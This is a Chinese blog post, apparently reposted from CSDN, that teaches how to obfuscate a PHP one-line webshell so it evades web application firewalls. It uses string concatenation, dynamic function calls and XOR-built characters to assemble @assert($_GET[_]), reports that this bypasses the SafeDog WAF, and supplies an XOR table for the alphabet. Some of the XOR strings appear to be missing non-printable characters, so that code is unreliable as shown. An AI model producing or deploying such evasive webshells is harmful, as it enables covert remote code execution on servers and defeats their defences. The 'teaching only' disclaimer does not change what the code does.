乘风原创程序

  • PHP一句话木马免杀
  • 2020/7/29 15:52:25
  • 作者:小刚
    一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
    本实验仅用于信息防御教学,切勿用于其它用途

    免杀小技巧

    1.字符串拼接方式,构造敏感函数。

    <?php
    $a = 'ass';
    $b = 'er';
    $c = 't';
    $d = $a.$b.$c; //assert
    

    2.通过PHP的动态函数方法执行一句话。

    <?php
    $a = 'assert';
    $b = '_GET';
    $a($$b['mu']); //assert($_GET['mu'])
    

    动态函数的使用在这有部分介绍

    3.利用php异或^构造字符串

    PHP有一特性
    当两个字符串执行异或,会得到一个字符串。
    可以通过两个非字母字符串构造a-z任意字母

    <?php
    $a = (''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`')echo $a;//abcdef
    

    免杀木马构造

    综合上面提到的小技巧,实现一句话木马的构造,并绕过大部分WAF

    <?php
    $_=(''^'`').(''^'`').(''^'`');//ass
    $__=(''^'`').(''^'`').(''^'`'); //ert
    $_ = $_.$__;//assert
    $__='_'.('\''^'`').('%'^'`').('4'^'`'); //_GET
    
    //$__='_'.('
    //'^']').('/'^'`').(''^']').('	'^']'); //_POST
    
    $___=$$__;
    @$_($___[_]); //@assert($_GET[_])
    ?>
    

    一句话测试

    成功执行,绕过安全狗检测
    在这里插入图片描述

    在这里插入图片描述

    异或转码数据

    自己整理的部分可实现的字符串
    乱码字符是ASCII码,直接复制到本地php文件中使用即可。

    (''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`')//abcdefg
    (''^'`').('	'^'`').('
    '^'`').(''^'`').(''^'`').('
    '^'`').(''^'`')//hijklmn
    (''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`')//opqrst
    (''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`')//uvwxyz
    
    ('!'^'`').('"'^'`').('#'^'`').('$'^'`').('%'^'`').('&'^'`').('\''^'`')//ABCDEFG
    ('('^'`').(')'^'`').('*'^'`').('+'^'`').(','^'`').('-'^'`').('.'^'`')//HIJKLMN
    ('/'^'`').('0'^'`').('1'^'`').('2'^'`').('3'^'`').('4'^'`')//OPQRST
    ('5'^'`').('6'^'`').('7'^'`').('8'^'`').('9'^'`').(':'^'`')//UVWXYZ
    
    (''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']')//ABCDEFG
    (''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']')//HIJKLMN
    (''^']').('
    '^']').(''^']').(''^']').(''^']').('	'^']')//OPQRST
    (''^']').(''^']').('
    '^']').(''^']').(''^']').(''^']')//UVWXYZ
    

    小结

    waf的免杀绕过就是打乱木马的特征。
    这里只测试了安全狗能绕过,其他waf自行测试吧

    本文地址:https://blog.csdn.net/weixin_43221560/article/details/107598123